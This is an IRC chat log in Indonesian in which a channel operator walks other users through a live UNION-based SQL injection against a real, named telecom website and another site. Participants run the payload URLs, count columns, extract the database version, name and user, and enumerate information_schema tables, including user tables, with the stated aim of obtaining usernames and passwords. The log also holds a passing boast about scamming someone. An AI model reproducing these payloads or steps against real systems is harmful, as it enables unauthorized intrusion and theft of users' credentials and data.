<+ayunk> Please check your credit card statement (monthly transaction history) either online or when it arrives in the mail from the credit card issuer. On this statement, you will see a $1.95 USD charge from PayPal. Next to this charge, you will see a 4-digit Expanded Use Number, which can be found directly before the word PAYPAL. Note that it may take 3-4 working days for the number to appear on your statement.
<&home_edition2001> wekekek
<&home_edition2001> mpos
<+Bukan-Diriku> lanjottttt
<+ayunk> hiks asyik
* +anti_polda (dodo@E5B64C3A.856A2317.B1F07E1.IP) Quit (Ping timeout)
<&home_edition2001> nah itu web sudah + bisa di explorer
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 union select 0--
<&home_edition2001> cek
<&home_edition2001> this
<&home_edition2001> apa repostnya
<&home_edition2001> masih erorr kan
<&home_edition2001> wakak
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 union select 0,1--
<&home_edition2001> masih eror ya
<&home_edition2001> wakak
<&home_edition2001> sokor mpos
<&home_edition2001> lanjot
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 union select 0,1,2--
<&home_edition2001> wakkkaa
<+NoGe> kaga ada
<&home_edition2001> masih erorr juga
<&home_edition2001> gak ada NoGe
* anti_polda (dodo@E5B64C3A.856A2317.B1F07E1.IP) has joined #nyubicrew
<&home_edition2001> gak ada apa NoGe
<&home_edition2001> wakak
<&home_edition2001> lanjut injeksinya
<&home_edition2001> sampe artikel yang tadi dibaca muncul lagi
<+setiawan> NOGE = Nongnong Gede
<+setiawan> ekee
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 union select 0,1,2,3--
<&home_edition2001> masih juga
<&home_edition2001> sialll
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 union select 0,1,2,3,4--
<&home_edition2001> masih juga
<&home_edition2001> duh server ngajakin ribut
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 union select 0,1,2,3,4,5--
<&home_edition2001> wew
* live sets mode: +v anti_polda
<&home_edition2001> trus ayo berusaha
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 union select 0,1,2,3,4,5,6--
<&home_edition2001> duh masih juga
<&home_edition2001> jangan bosen2 ya
<+Bukan-Diriku> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11--
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 union select 0,1,2,3,4,5,6,7--
<+Bukan-Diriku> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11--
<&home_edition2001> wew
<+NoGe> iya masih error kek tadi
<&home_edition2001> swet bukan diriku
<+Bukan-Diriku> tuh dah ga error
<+Bukan-Diriku> :D
<&home_edition2001> tu Bukan-Diriku udah ketemu
<&home_edition2001> kondisi true
<&home_edition2001> wakakaka
<&home_edition2001> sep
<+NoGe> tambahin ' juga kliatan error ne
<&home_edition2001> dengan menaikan angka tadi kita membuat kondis yang false jadi true
<&home_edition2001> udah paham lom sampe sini
<&home_edition2001> oke contoh lain
<&home_edition2001> gw ada ne
* +dayak (.@2033288E.D4390B68.116286D9.IP) Quit (Ping timeout)
<+Bukan-Diriku> union select <---- ?
<&home_edition2001> jumlah2 angka itu gak jadi patokan musti 0-11
<&home_edition2001> apa aja ya
<+NoGe> so?
* +ayunk ikutan ... belajar
<+NoGe> donlot dolo video ne biar bisa konek2 dikit gw
<@live> MILDnet Info : INFO Wanna download mp3 join #INDOMP3
<&home_edition2001> http://www.translation.net/kb/index.html?ToDo=browse&catId=1 << coba sampe berapa
<&home_edition2001> ayo latihan mencari union
<&home_edition2001> wakakak
<&home_edition2001> ayo sapa bisa
<&home_edition2001> itu dasarnya
<+Bukan-Diriku> leletttttttttttttttttttttttt
* +needymax (ManGreat@9B064714.82F20AC5.8154B555.IP) Quit (Quit: )
<+Bukan-Diriku> Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/u1/trans/html/kb/index.html on line 1613
<+Bukan-Diriku> No questions exist in the selected category. Go back
<&home_edition2001> masih tu
<&home_edition2001> wakka
<+NoGe> !ping me
<&home_edition2001> lanjut
<&home_edition2001> latihan jari
<&home_edition2001> mana anti_polda
<&home_edition2001> mana anti_polda
<&home_edition2001> mana anti_polda
<+Bukan-Diriku> View Questions by Category:
<&home_edition2001> mana anti_polda
<+Bukan-Diriku> 1 (72)
<+Bukan-Diriku>
<+Bukan-Diriku> Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/u1/trans/html/kb/index.html on line 1613
<&home_edition2001> udah sampe berapa lo Bukan-Diriku
<&home_edition2001> masih tu
<+Bukan-Diriku> http://www.translation.net/kb/index.html?ToDo=browse&catId=1%20union%20select%200,1,2,3,4,5,6--
<&home_edition2001> sep
<+Bukan-Diriku> tuh
<&home_edition2001> mantab Bukan-Diriku
<&home_edition2001> wakaka
<&home_edition2001> jadi angka2 itu gak jadi patokan ya
<&home_edition2001> yang udah pasti adalah
<+Bukan-Diriku> siapp
* dayak (.@1B9AFCB6.26BD2D04.87C6D485.IP) has joined #nyubicrew
<+Bukan-Diriku> angka2 ntu maksud na paan?
<&home_edition2001> untuk tes injekan harus pakai and 1=0 klo asp kan tanda '
<+NoGe> hmm..
<&home_edition2001> angka gak tau gak di jelasin
<&home_edition2001> wakaka
* &home_edition2001 juga gak tau
<+Bukan-Diriku> wedew
<&home_edition2001> gosipnya se tabel sql servernya
<+Bukan-Diriku> kek na seh
<+Bukan-Diriku> :D
<&home_edition2001> trus
<&home_edition2001> untuk injeksinya
<&home_edition2001> selanjutnya
<+NoGe> seep bius
* live sets mode: +v dayak
<+NoGe> lanjot
<+NoGe> apa lagi niy
<+NoGe> :))
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11-- << kembali ke tanktop
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 << inikan angka 27
<&home_edition2001> lo tambahin tanda - di depannya
<&home_edition2001> jadi
<&home_edition2001> -27
<&home_edition2001> karena tanda - membuat si sql server erorr
<&home_edition2001> or gak di define kali
<+Bukan-Diriku> Gold 0.006471 0.2013 4.86 <-- wedew
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11-- << ni jadinya
<&home_edition2001> tu cek apa yang lo liaty\
<&home_edition2001> wew
<&home_edition2001> sepi kali
<&home_edition2001> wakak
<&home_edition2001> !ping me
-BaWoeK- CyberMania Your PING Reply Is: 3secs
<+NoGe> ya bius
<+Bukan-Diriku> lanjoottt
<+Bukan-Diriku> 1
<+Bukan-Diriku> 3
<+Bukan-Diriku> [Download Document : 7]
<+Bukan-Diriku> Last Update 8
<+Bukan-Diriku> back
* +NoGe mah nyimak
<+NoGe> :)
<+NoGe> cuman gw lag
<+NoGe> iks
<+anti_polda> tampilan di esia newsnya keluar 1 3
<+anti_polda> 1
<+anti_polda> 3
<+anti_polda> [Download Document : 7]
<&home_edition2001> wew
<+NoGe> xial lag gw
<+anti_polda> trus apa lagi ///
<+Bukan-Diriku> Gold 0.006471 0.2013 4.86 <-- lom bisa bli rokok neh
<+NoGe> gpp lanjot la
<&home_edition2001> tau gak artinya
<+anti_polda> gk
<+Bukan-Diriku> ga
<&home_edition2001> artinya itu angka yang bisa di jadikan display untuk query
<&home_edition2001> tadi kan dah dapet kan angka dari 0-11
<&home_edition2001> nah berarti dari repot ini kita cuman bisa make angka 1 dan 3
<+NoGe> 1
<+NoGe> 3
<+NoGe> [Download Document : 7]
<+NoGe> Last Update 8
<+NoGe> back
<+NoGe> ya ya
* CYBER_GHOST (asuki@CYBER_GHOST.users.mildnet.org) has joined #nyubicrew
<&home_edition2001> untuk mendajankan query
* +SateliT pamed
* +SateliT (I-Ha_Te-U@SateliT.users.mildnet.org) Quit (Quit from MILDNet: )
<+NoGe> he`eh
<@live> MILDnet Info : INFO Wanna download mp3 join #INDOMP3
<+NoGe> oOo
<&home_edition2001> kek nya 7 dan 8 jug ade
* live sets mode: +v CYBER_GHOST
<+NoGe> next
<&home_edition2001> http://www.reversing.org/node/view/13 < buka ini untuk cek bener jalan gak qurynya
<+CYBER_GHOST> tq
* +MosDef (MosDef@MosDef.users.mildnet.org) Quit (Ping timeout)
<&home_edition2001> Selectable blind objects
<&home_edition2001> In sqlbftools project readme are documented some of the objects available from a blind sql injection. This POC use some kind of bruteforce explained in this paper: adaptive dictionaries for bruteforce cracking
<&home_edition2001> Selectable blind objects are those who export important information about database manager, like functions or important values:
<&home_edition2001> * version(): current mysql version
<&home_edition2001> * database(): current database where user is connected
<&home_edition2001> * user(): connected to the database
<&home_edition2001> * system_user(): obvious
<&home_edition2001> * session_user()
<&home_edition2001> * current_user()
<&home_edition2001> * last_insert_id()
<&home_edition2001> * connection_id()
<&home_edition2001> tu untuk ceknya
<&home_edition2001> ada user()
<&home_edition2001> ada cenection_id()
<&home_edition2001> tu query or perintah sql
<&home_edition2001> yang bisa di jalankan oleh angka2 yang nimbul
<&home_edition2001> gw biasanya make version()
* MosDef (MosDef@3CC12308.2B7A62E4.1D2720DD.IP) has joined #nyubicrew
<&home_edition2001> dan database()
* +Bukan-Diriku bRb pasang rokok dolow
<&home_edition2001> gimana menempatkannya
<&home_edition2001> mudah kok
<+Bukan-Diriku> bukan na database di bikin stress.. tapi pala gw yang stres.....kekekekkekekek :P~~~
* +The_Corrs (The_Corrs@MILD-EF271472.ipt.aol.com) Quit (Ping timeout)
<&home_edition2001> tadi angka berapa aja yang keluar
<&home_edition2001> lupa
<+Bukan-Diriku> 1 3
<&home_edition2001> 1 3 7 8 ya
<&home_edition2001> ok
* live sets mode: +v MosDef
<&home_edition2001> kita pasang deh
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,now(),2,database(),4,5,6,user(),system_user(),9,10,11--
<+[^]YAMAHA[^]> brb matikan rokok Bukan-Diriku (( eh bang..!! kerja dolo baru merokok ))
<&home_edition2001> nah
* +[^]YAMAHA[^] brb matikan rokok Bukan-Diriku (( eh bang..!! kerja dolo baru merokok ))
<+[^]YAMAHA[^]> :D
* +NoGe (yuk@NoGe.users.mildnet.org) Quit (Ping timeout)
* +anti_polda (dodo@E5B64C3A.856A2317.B1F07E1.IP) Quit (Ping timeout)
<&home_edition2001> 1 gw ganti now() < buat liat time di server
<&home_edition2001> 3 gw ganti database() << utk liat nama database target
<&home_edition2001> 7 dan 8 sama
<&home_edition2001> wakaka
<&home_edition2001> apa yang lo liat
<&home_edition2001> dari hasil nya
* +[^]YAMAHA[^] kelen semua
* anti_polda (dodo@6F13E1C9.7262A6.B1F07E1.IP) has joined #nyubicrew
* +[^]YAMAHA[^] kelen semua
<+hantu_manis> ada yg tau gprs gratizzzzzzzz <<<<--- jawap plizzzzz
<+hantu_manis> ada yg tau gprs gratizzzzzzzz <<<<--- jawap plizzzzz
<+ayunk> ?
<+Bukan-Diriku> 2007-10-11 20:10:41
<+Bukan-Diriku> myesiacom_webv2
<+Bukan-Diriku> [Download Document : myesiacom_webv2@localhost]
<+Bukan-Diriku> Last Update myesiacom_webv2@localhost
<&home_edition2001> gimana ngerti semua
<&home_edition2001> wew
<&home_edition2001> angka2 tadi berubahkan sesuai yang kita inginkan
<+Bukan-Diriku> hmmmm
* live sets mode: +v anti_polda
* +setiawan (-@DC56459B.F034C7B0.7FCA83D3.IP) Quit (Quit: MCM Internet Cafe Jl.Ruko Serayu No.7 Tegal)
<+Bukan-Diriku> mulai ngerti gw
<&home_edition2001> coba 8 lo ganti version()
<+Bukan-Diriku> :D
<+anti_polda> gw masih belum bro
<&home_edition2001> wakak
<+anti_polda> :(
<&home_edition2001> dimana gak ngertinya say
<&home_edition2001> nah server itu enak
* da_jackass (yuk@99B9DD7D.F0595D70.6011470F.IP) has joined #nyubicrew
<&home_edition2001> banyak yang bisa buat nampilin query
<+chawanua> sulit klo ga ada dasar ...
<&home_edition2001> nah klo cuman 1 doank gimana
<&home_edition2001> waka
<+anti_polda> tadi lo bilang lo biasanya pakai version
<&home_edition2001> nar juga paham
<&home_edition2001> wew
<+anti_polda> maksudnya
<&home_edition2001> version dll buat cek doank bisa jalan gak injeksi kita
<&home_edition2001> itu doank ko
* The_Corrs (The_Corrs@MILD-EF271472.ipt.aol.com) has joined #nyubicrew
<&home_edition2001> kita blom ke tujuan utama lo mengeluarkan username ama pass
<&home_edition2001> tujuan akhirkan itu
<&home_edition2001> wakaka
* live sets mode: +v da_jackass
<+Bukan-Diriku> jd
<+haLah> terus gimana ngeluarinnya
<+haLah> wixixiixixix
<&home_edition2001> wew
<&home_edition2001> sabar kita belajar di luar dolo la
<&home_edition2001> xixi
* live sets mode: +v The_Corrs
<&home_edition2001> gimana dengan 1 tampilan kita bisa mengeluarkan perintah sekaligus
<&home_edition2001> jawabannya dengan concat
* +haLah nyimak
<@live> MILDnet Info : INFO MILDnet Network Staff doesnt responsible for anything you done in this networks as long as not disturb staff, networks and other user, so please behave your self :)
<&home_edition2001> concat(version(),-,now(),-,database(),-,user())
<&home_edition2001> tu caranya
<&home_edition2001> jadi bisa di susun seperti ini
* root_byte (root_byte@MILD-15D1F4B9.dynamic.dialterra.com.br) has joined #nyubicrew
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,concat(version(),-,now(),-,database(),-,user()),2,3,4,5,6,7,8,9,10,11--
<&home_edition2001> nah ngerti ga
<&home_edition2001> jadi angka satu kita ganti concat(version(),-,now(),-,database(),-,user())
<+CYBER_GHOST> Not Found
<+CYBER_GHOST> The requested URL /fileup/myesiacom_webv2@localhost was not found on this server.
<+CYBER_GHOST> Apache Server at www.myesia.com Port 80
<+CYBER_GHOST> kok ga bisa?
* live sets mode: +v root_byte
<&home_edition2001> bias pake ip indonesia la
<+haLah> sama
<+Bukan-Diriku> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/myesiacom/sites/myesia.com/www/pagecontent.inc.php on line 177
<&home_edition2001> Bukan-Diriku bisa
<&home_edition2001> knapa gak
<&home_edition2001> isa
<&home_edition2001> wakaka
<&home_edition2001> karena kita harus conver tanda - ke hexa
<+CYBER_GHOST> hahahaha
<&home_edition2001> biar bisa di mengerti sql
<&home_edition2001> - hexanya apa ya
<+CYBER_GHOST> ouhg.... hexa?
<&home_edition2001> wait
<+CYBER_GHOST> occay
<&home_edition2001> - << inikan ascii
<&home_edition2001> http://www.piclist.com/techref/ascii.htm << ni tempatnya
<&home_edition2001> buat conversi
<+da_jackass> ?
<&home_edition2001> 2D << ni hexanyua
<&home_edition2001> - = 2D
<&home_edition2001> ngerti
* +anti_polda (dodo@6F13E1C9.7262A6.B1F07E1.IP) Quit (Ping timeout)
* +demittegal (demittegal@D.e.m.i.t) Quit (Connection reset by peer)
<&home_edition2001> ngertikan sampe sini
<&home_edition2001> jadi bisa kita susun
* LamerCrew (Lamer@Abuse.MildNet.Org) has joined #nyubicrew
* Help sets mode: +o LamerCrew
<&home_edition2001> jadi angka satu kita ganti concat(version(),0x2D,now(),0x2D,database(),0x2D,user())
<&home_edition2001> gak tau juga gw knapa musti ditambah 0x
* anti_polda (dodo@6F13E1C9.7262A6.B1F07E1.IP) has joined #nyubicrew
<&home_edition2001> coba dimasukin deh
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,concat(version(),0x2D,now(),0x2D,database(),0x2D,user()),2,3,4,5,6,7,8,9,10,11--
<+Bukan-Diriku> 0x <-- dasar assembly... kekekekeke
<+Bukan-Diriku> mpozzzz dah neh pala
<+haLah> 5.0.30-Debian_1-log-2007-10-11 20:20:56-myesiacom_webv2-myesiacom_webv2@localhost
<+haLah>
<&home_edition2001> wew
<+haLah> ica
<+haLah> xiixixix
<&home_edition2001> mantab kan
<&home_edition2001> xixi
<&home_edition2001> mantabb
<+da_jackass> 5.0.30-Debian_1-log-2007-10-11 20:21:34-myesiacom_webv2-myesiacom_webv2@localhost
<+da_jackass> 3
<+da_jackass> [Download Document : 7]
<&home_edition2001> duh gw kebelet boker dolo ya anak2
<&home_edition2001> wakaka
* live sets mode: +v anti_polda
<+da_jackass> jah dia boker
<+Bukan-Diriku> zzzzzzzzzzzzzzzzzzz
<+haLah> jis
<+da_jackass> wkakwak
<+haLah> wakkakawkwakawkaw
* +abulhaul (anakmapek@833F68C0.B2787F5A.7F86A531.IP) Quit (Ping timeout)
<@live> MILDnet Info : INFO MILDnet Network Staff doesnt responsible for anything you done in this networks as long as not disturb staff, networks and other user, so please behave your self :)
<@LamerCrew> ew
* +da_jackass (yuk@99B9DD7D.F0595D70.6011470F.IP) has left #nyubicrew
* NoGe (yuk@NoGe.users.mildnet.org) has joined #nyubicrew
* Help sets mode: +h NoGe
<%NoGe> nah
* &home_edition2001 back
<+anti_polda> 0x2D,now(),0x2D,database(),0x2D,user())<-----gk ngerti
<&home_edition2001> duh lega
* demittegal (demittegal@DC56459B.F034C7B0.7FCA83D3.IP) has joined #nyubicrew
<%NoGe> bius dah selese boker?
<+anti_polda> 0x2D,now(),0x2D,database(),0x2D,user())<-----gk ngerti
<&home_edition2001> wakakaka
<+anti_polda> tolong di ulang DC mulu nih
<+haLah> pa lagi gw
<+haLah> :((
<&home_edition2001> 0x2D = -
<+CYBER_GHOST> Not Found
<+CYBER_GHOST> The requested URL /fileup/7 was not found on this server.
<+CYBER_GHOST> Apache Server at www.myesia.com Port 80
<+CYBER_GHOST> hiks...
<%NoGe> anti_polda http://www.reversing.org/node/view/13
<+[^]YAMAHA[^]> gak siap2 si home_edition2001 boker
<&home_edition2001> CYBER_GHOST pake ip indonesia
<+CYBER_GHOST> tetep g bisa di dunlut
* live sets mode: +v NoGe
<%NoGe> bius lanjut
<&home_edition2001> ok
<&home_edition2001> xixix
<&home_edition2001> sep
<+Bukan-Diriku> knapa musti pakek tanda "-"
<+Ibenk_19_Hoki> biar keren kale
<+Ibenk_19_Hoki> -.-"
<+Bukan-Diriku> kekekekkee
<+Ibenk_19_Hoki> jiakakka
<&home_edition2001> biar ada tanda jeda
* live sets mode: +v demittegal
<%NoGe> karena tanda - membuat si sql server erorr
<&home_edition2001> ntar lo bingung
<+Ibenk_19_Hoki> owh...
<&home_edition2001> antara hasil 1 sama hasil 2
<+arioo> kwekwekwekwe
<&home_edition2001> wakaka
<+arioo> om homo jadi guru
<+arioo> xixixix
<&home_edition2001> gak lah NoGe
<+arioo> mantebb
<+arioo> xixixix
<%NoGe> kwakwka
<%NoGe> next pliss
<+haLah> lanjot lah pak
<&home_edition2001> <%NoGe> karena tanda - membuat si sql server erorr << tanda pisah aja dari pada spasi lebih jelas tanda - or bisa di ganti / : dll
<&home_edition2001> asal di converd dolo ke hesa
<%NoGe> arioo mwah mwah dolo lakh
<&home_edition2001> asal di converd dolo ke hexa
<&home_edition2001> ok
<+Bukan-Diriku> seep
<&home_edition2001> itu tadi versi berapa
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11-- << balik kesini lagi
<&home_edition2001> tadi versi berapa sql servernya
<&home_edition2001> kacang2
<&home_edition2001> kacang2
<&home_edition2001> tadi versi berapa sql servernya
<&home_edition2001> tadi versi berapa sql servernya
<&home_edition2001> kacang2
<&home_edition2001> kacang2
<&home_edition2001> kacang2
<%NoGe> hue
<+haLah> 5.0.30-Debian_1-log-2007-10-11 20:20:56-myesiacom_webv2-myesiacom_webv2@localhost
<+haLah>
<&home_edition2001> versi 5 ya
<%NoGe> versi ne mana
<&home_edition2001> buka lagi kamusnya
<&home_edition2001> 5.0.30-Debian_1-log << versi
<%NoGe> nah
<&home_edition2001> http://www.reversing.org/node/view/13 << ni kamus kita
<+anti_polda> 5.0.30-Debian_1-log-2007-10-11
<&home_edition2001> wajaja
<&home_edition2001> wakaka
<&home_edition2001> 2007-10-11 << ini date dodol
<&home_edition2001> waa
<%NoGe> ok2
<&home_edition2001> gimana gak pake tanda -
<&home_edition2001> wakaka
<+anti_polda> iya 5.0.30-Debian ni versinya...
<+anti_polda> trus...
<&home_edition2001> liat ini
<&home_edition2001> ----------------------------potong---------------------
<&home_edition2001> Mysql version cares
<&home_edition2001> Diferent Mysql versions will have diferent features. Where there's no way in MySQL to know the databases structure other than using SHOW in mysql 3 and 4, in Mysql 5.x there's a new table, INFORMATION_SCHEMA, holding everything about databases, tables, columns and so. Some recursive selects requests to this table will give all the information about the database.
<&home_edition2001> http://dev.mysql.com/doc/refman/4.1/en/
<&home_edition2001> http://dev.mysql.com/doc/refman/5.0/en/
<&home_edition2001> So, it's not only that diferent functions will be available, also diferent tables are version dependant. It's important then to notice that version of exploited MySQL is the first task to guess no matter how. MySQL 3 doesn't support UNION sentences, MySQL5 incorporates the INFORMATION_SCHEMA table.. Not every operation can be executed in every MySQL version.
<&home_edition2001> ------------------------end--------------------------------------
<&home_edition2001> tu celah versi 5
<+Ibenk_19_Hoki> ------------------------------
<+Ibenk_19_Hoki> ------------------------------
<&home_edition2001> INFORMATION_SCHEMA << ada fasilitas ini
<+Ibenk_19_Hoki> makan lontong
<+Ibenk_19_Hoki> ----------------
<&home_edition2001> wakaka
<&home_edition2001> Ibenk_19_Hoki wakaka
<&home_edition2001> oke
<&home_edition2001> kita susun ya
<%NoGe> yuu
<&home_edition2001> skarang latihan membuka tabel
<&home_edition2001> skarang latihan membuka tabel
<&home_edition2001> skarang latihan membuka tabel
<&home_edition2001> skarang latihan membuka tabel
<&home_edition2001> skarang latihan membuka tabel
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11-- << kembali ke tanktop
<&home_edition2001> wakaka
* Jee (...@64B8F006.EC98180.1002205F.IP) has joined #nyubicrew
<&home_edition2001> nah INFORMATION_SCHEMA << inikan berupa tabel defaultkan bawaan dari si sql
<&home_edition2001> cara liatnya gini
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11 from INFORMATION_SCHEMA-- << neh
<&home_edition2001> coba
<%NoGe> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/myesiacom/sites/myesia.com/www/pagecontent.inc.php on line 177
<+Bukan-Diriku> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/myesiacom/sites/myesia.com/www/pagecontent.inc.php on line 177
* live sets mode: +v Jee
<&home_edition2001> Bukan-Diriku salah tu
<&home_edition2001> harusnya gak eroor
<&home_edition2001> gw gak erorr
<@live> MILDnet Info : DONATE Support MILDnet Network by donate your e-gold account to http://4222642.e-gold.com/ we appreciate all donation that you make, thank you
<%NoGe> wew
<+Ibenk_19_Hoki> siapa yg udah lebaran nich...
<%NoGe> gw juga error
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11
* +dayak (.@1B9AFCB6.26BD2D04.87C6D485.IP) Quit (Ping timeout)
<+Ibenk_19_Hoki> jah.. ok ok.. lanjutin kalo masih ngebahas ituan.. !!
<&home_edition2001> wakaka
<&home_edition2001> dodol la gw
<&home_edition2001> gw yang dodol sory
<%NoGe> :)
<+Ibenk_19_Hoki> gw laporin ama esia ntar
<+Ibenk_19_Hoki> xixixiix
<+arioo> Ibenk_19_Hoki <-- staff esia neh kwekwekwek
<+Ibenk_19_Hoki> jikakakakkaka
<+katro> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/myesiacom/sites/myesia.com/www/pagecontent.inc.php on line 177
<+anti_polda> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/myesiacom/sites/myesia.com/www/pagecontent.inc.php on line 177 <---gw gini juga bius
<%NoGe> arioo mwah mwah dolo lah
<+Bukan-Diriku> bRb bakar rokok lagee
<+Bukan-Diriku> wiuuuuuuuuuuuuuuuuuuuuuu........... suara takbir jekkkkkkkkkkkkkk bikin merinding gwv :(
* +The_Corrs (The_Corrs@MILD-EF271472.ipt.aol.com) Quit (Ping timeout)
<+arioo> wiuuuuuuuuuuuuuuuuuuuuuu........... suara takbir jekkkkkkkkkkkkkk bikin merinding gwv :( <-- tanda banyak dosa
<+arioo> jiwakawkawkawkwaaw
<+arioo> jiwakawkawkawkwaaw
* +arioo kabooor
<+arioo> xixixix
<&home_edition2001> wakaka
<&home_edition2001> kurang
<+Bukan-Diriku> asuuuuuuuuuuuuuuu
<+Bukan-Diriku> sene kow arioo.... tak sodomi kowww
<&home_edition2001> nah INFORMATION_SCHEMA.tables << untuk cari tabel
<&home_edition2001> nah INFORMATION_SCHEMA.column << untuk cari colom
<+SaPi`KeReN> bRb bakar rokok lagee <=- yang yang bisa bangun aja. supaya tahan lama. Kadang besar kadang kecil
<&home_edition2001> skarang kita cari tabelnya ya
<+arioo> !Dns
<+SaPi`KeReN> seep
* +SaPi`KeReN sambil liatin aja
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables-- << wew
<&home_edition2001> good
<&home_edition2001> sep
<&home_edition2001> skarang cari tabel ya
<%NoGe> 1
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> iks
<&home_edition2001> sep
<+katro> 1
<+katro> 3
<+katro> [Download Document : 7]
<+katro> Last Update 8
<+katro> back
<&home_edition2001> angka satu kita keluarkan tabelnya
<%NoGe> yuu
<&home_edition2001> ganti 1 dengan tables_name
* +anti_polda (dodo@6F13E1C9.7262A6.B1F07E1.IP) Quit (Ping timeout)
<&home_edition2001> ganti 1 dengan table_name
* anti_polda (dodo@E5B64C3A.856A2317.B1F07E1.IP) has joined #nyubicrew
<+Ibenk_19_Hoki> Rui Jorge Ribeiro da Costa says: It's ok.. I will order 10 piece from you with total $3500
<+Ibenk_19_Hoki> jiakakaka
<+Ibenk_19_Hoki> gw tipuin rui costa
<+Ibenk_19_Hoki> pemain bola kan byk duit nya
<+katro> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,tables name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables--
<+Bukan-Diriku> esia_user <-- aw aw aw
<+Bukan-Diriku> esia_user <-- aw aw aw
<+Bukan-Diriku> esia_user <-- aw aw aw
<+Bukan-Diriku> esia_user <-- aw aw aw
* dream_of_confutions (giggs@dream_of_confutions.users.mildnet.org) has joined #nyubicrew
<%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables--
<&home_edition2001> wakaka
* anakbugis (anakbugis@MILD-A255F93F.ipt.aol.com) has joined #nyubicrew
<&home_edition2001> keluar semu akan
<&home_edition2001> keluar semua kan
<&home_edition2001> xixi
* dayak (.@MILD-B84942B9.ipt.aol.com) has joined #nyubicrew
* +Brew0ks (FuCk@MILD-479B93A.ipt.aol.com) Quit (Ping timeout)
* live sets mode: +v anti_polda
<&home_edition2001> gak sia2 injek2 dari tadi
<%NoGe> esia_other_cat
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> Last Update 8
<%NoGe> esia_prabayar
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> Last Update 8
<%NoGe> esia_search
<%NoGe> hehehe
<%NoGe> kliatan iks
<+katro> users
<+katro> 3
<+katro> [Download Document : 7]
<+katro> he he he
* live sets mode: +v dream_of_confutions
<&home_edition2001> mantab si katro
<&home_edition2001> langsung kepusat saraf
* live sets mode: +v anakbugis
<@LamerCrew> bahhhh
<+CYBER_GHOST> hiks...
<@LamerCrew> si ratu HOMO ada disini -_-'
<+Ibenk_19_Hoki> udah hari royo ora iki yoo
* +CYBER_GHOST dodol banget
<%NoGe> hahaha
* The_Corrs (The_Corrs@MILD-EF271472.ipt.aol.com) has joined #nyubicrew
* Help sets mode: +h anakbugis
<+Ibenk_19_Hoki> bingung gw
<+arioo> wkekwekweew
<+katro> cara ngeluarin isi table user nya ?
<+arioo> :D
<+CYBER_GHOST> blas ra ngerti euy...
<+CYBER_GHOST> T_T
<+arioo> :D
<&home_edition2001> nah itukankan gak tau tabel dari mana asalnya
<+arioo> kwekwekwe
<&home_edition2001> kita sortir yu
<+katro> yup
<+Ibenk_19_Hoki> yukk yukk
<+anti_polda> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/myesiacom/sites/myesia.com/www/pagecontent.inc.php on line 177
<+katro> home_edition2001 : tar dibikin txt nya yak
* live sets mode: +v dayak
<+anti_polda> kok sama aja keluarannya sama sebelumnya
<+katro> wekekeekekekeke
<&home_edition2001> kita mau keluarin tabel yang ada di database dia aja selain itu kita gak keluarkan
<&home_edition2001> setubuh ga
<&home_edition2001> wew
<&home_edition2001> gw gak lok mircnya
<&home_edition2001> mungkin temen2 ada yang ngelog
<+arioo> setubuuuhhh
* +dayak (.@MILD-B84942B9.ipt.aol.com) Quit (Ping timeout)
<+katro> gue log
<+arioo> tapi setubuh nya ama cewek
<+katro> tar gue bikin
<+arioo> kwekwkwe
<+arioo> :D
<+arioo> klo ama oms homo kagak mao gue
<+arioo> -,-`
<+katro> lu nanti koreksi dah home_edition2001
<%NoGe> bius lanjut
* live sets mode: +v The_Corrs
<+arioo> pakek ip asli aza uit
<+arioo> rame rame
<+arioo> kwekwewe
